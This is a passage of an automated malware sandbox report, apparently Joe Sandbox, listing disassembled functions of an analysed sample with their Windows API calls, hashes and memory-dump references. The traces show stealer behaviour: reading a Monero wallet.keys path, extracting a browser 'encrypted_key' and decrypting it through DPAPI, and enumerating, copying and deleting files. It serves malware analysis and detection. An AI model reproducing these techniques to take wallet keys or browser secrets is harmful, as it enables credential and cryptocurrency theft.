                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 49055be967160f2748e724119ab9b13ce2a036d64b5fb0e15dbf8b5412d8f19e
                        • Instruction ID: 65f2f1fa50700fdd748b4f9e7280093856083e76cd536bef6aaf1257512ed191
                        • Opcode Fuzzy Hash: 49055be967160f2748e724119ab9b13ce2a036d64b5fb0e15dbf8b5412d8f19e
                        • Instruction Fuzzy Hash: 1B9138728111089BDB14FBA0DD52DEE7338AF54320F504169F517B7091EF396A8AEB62
                        Function 00F0D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                          • Part of subcall function 00F18B60: GetSystemTime.KERNEL32(00F20E1A,008AAD30,00F205AE,?,?,00F013F9,?,0000001A,00F20E1A,00000000,?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F18B86
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F0D801
                        • lstrlen.KERNEL32(00000000), ref: 00F0D99F
                        • lstrlen.KERNEL32(00000000), ref: 00F0D9B3
                        • DeleteFileA.KERNEL32(00000000), ref: 00F0DA32
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: a87d8baa5f3e930048d561a09de966011e0f5cb63d182affc33f548986233139
                        • Instruction ID: dcbf6059fc160eac03481dbbe6028b541ad51b9939be6fbb1362f2183fe6c9c9
                        • Opcode Fuzzy Hash: a87d8baa5f3e930048d561a09de966011e0f5cb63d182affc33f548986233139
                        • Instruction Fuzzy Hash: 798145729511089BDB18FBA0DD52DEE7338BF54320F504128F417A70D1EF396A8AEB62
                        Function 00F13560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        • API String ID: 367037083-0
                        • Opcode ID: cce39353c9ff0bdacc09ab5ed7fb00fea89ea07ab8538924e375442829c239ed
                        • Instruction ID: 5dc67c511267931465b9874cad194d22504e09fc58c78bcbd16fa912e8900fa5
                        • Opcode Fuzzy Hash: cce39353c9ff0bdacc09ab5ed7fb00fea89ea07ab8538924e375442829c239ed
                        • Instruction Fuzzy Hash: 9F4141B1D10109ABCB04EFA4DD45EEEB778EF54714F008018F41677281EB399A85EFA2
                        Function 00F09CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F099EC
                          • Part of subcall function 00F099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F09A11
                          • Part of subcall function 00F099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00F09A31
                          • Part of subcall function 00F099C0: ReadFile.KERNEL32(000000FF,?,00000000,00F0148F,00000000), ref: 00F09A5A
                          • Part of subcall function 00F099C0: LocalFree.KERNEL32(00F0148F), ref: 00F09A90
                          • Part of subcall function 00F099C0: CloseHandle.KERNEL32(000000FF), ref: 00F09A9A
                          • Part of subcall function 00F18E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F18E52
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00F09D39
                          • Part of subcall function 00F09AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F04EEE,00000000,00000000), ref: 00F09AEF
                          • Part of subcall function 00F09AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00F04EEE,00000000,?), ref: 00F09B01
                          • Part of subcall function 00F09AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F04EEE,00000000,00000000), ref: 00F09B2A
                          • Part of subcall function 00F09AC0: LocalFree.KERNEL32(?,?,?,?,00F04EEE,00000000,?), ref: 00F09B3F
                          • Part of subcall function 00F09B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00F09B84
                          • Part of subcall function 00F09B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00F09BA3
                          • Part of subcall function 00F09B60: LocalFree.KERNEL32(?), ref: 00F09BD3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 2100535398-738592651
                        • Opcode ID: 8962a82e0cdcb7cf5e895c1fb1351e79d00f84ab970ee9238d761663922de62b
                        • Instruction ID: 865c9d60f088b4e68967bd5ebd00bd0fda08aa81ddeee535e58b630197657a53
                        • Opcode Fuzzy Hash: 8962a82e0cdcb7cf5e895c1fb1351e79d00f84ab970ee9238d761663922de62b
                        • Instruction Fuzzy Hash: 003181B5D01109ABCF04EFE4DC85AEFB7B9BF48300F144518E911A7282F7749A04EBA1
                        Function 00F192E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(00F13AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00F13AEE,?), ref: 00F192FC
                        • GetFileSizeEx.KERNEL32(000000FF,00F13AEE), ref: 00F19319
                        • CloseHandle.KERNEL32(000000FF), ref: 00F19327
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSize
                        • String ID:
                        • API String ID: 1378416451-0
                        • Opcode ID: d65d53cc39d849035ce3ee3fbebdd2b88038fa7000efe2ee5a06b49bdb675039
                        • Instruction ID: 302b7781d1f8575963881378e146f567ee75b9563c6780c296e0763a5fbba2d7
                        • Opcode Fuzzy Hash: d65d53cc39d849035ce3ee3fbebdd2b88038fa7000efe2ee5a06b49bdb675039
                        • Instruction Fuzzy Hash: 0CF0A439E44204BBDB24DFB0EC14F9E77B9AB48721F11C164B622A72C4D6B596809B80
                        Function 00F1C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • __getptd.LIBCMT ref: 00F1C74E
                          • Part of subcall function 00F1BF9F: __amsg_exit.LIBCMT ref: 00F1BFAF
                        • __getptd.LIBCMT ref: 00F1C765
                        • __amsg_exit.LIBCMT ref: 00F1C773
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00F1C797
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        • API String ID: 300741435-0
                        • Opcode ID: 6dde2f75e2edefb2b46ef6bdfd50898e49b0bfae7c86f7c5ac8ad30f12653b18
                        • Instruction ID: 0ce9af5049fd784ca2a205d17548231f585890c56b9f21a6384bd8ce880c85ca
                        • Opcode Fuzzy Hash: 6dde2f75e2edefb2b46ef6bdfd50898e49b0bfae7c86f7c5ac8ad30f12653b18
                        • Instruction Fuzzy Hash: 0BF09A32D85714DBD720BBB8AC07BDE37A06F00720F244149F814AA1D2DBAC59C2BF96
                        Function 00F14F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F18E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00F14F7A
                        • lstrcat.KERNEL32(?,00F21070), ref: 00F14F97
                        • lstrcat.KERNEL32(?,008A9960), ref: 00F14FAB
                        • lstrcat.KERNEL32(?,00F21074), ref: 00F14FBD
                          • Part of subcall function 00F14910: wsprintfA.USER32 ref: 00F1492C
                          • Part of subcall function 00F14910: FindFirstFileA.KERNEL32(?,?), ref: 00F14943
                          • Part of subcall function 00F14910: StrCmpCA.SHLWAPI(?,00F20FDC), ref: 00F14971
                          • Part of subcall function 00F14910: StrCmpCA.SHLWAPI(?,00F20FE0), ref: 00F14987
                          • Part of subcall function 00F14910: FindNextFileA.KERNEL32(000000FF,?), ref: 00F14B7D
                          • Part of subcall function 00F14910: FindClose.KERNEL32(000000FF), ref: 00F14B92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                        • String ID:
                        • API String ID: 2667927680-0
                        • Opcode ID: bfa268093a5855f86fcb9ae3e6e729ffaa93a3e0ec9ef7dce6ea455103c14d56
                        • Instruction ID: 31ae9b381ff211c334a960346f93a931a68b206f78fcae78ecc0a35a3275c533
                        • Opcode Fuzzy Hash: bfa268093a5855f86fcb9ae3e6e729ffaa93a3e0ec9ef7dce6ea455103c14d56
                        • Instruction Fuzzy Hash: 9121D67A94020867D768FBA0FC46EE9333CAB54B00F404554B65A97085EE789AC99B92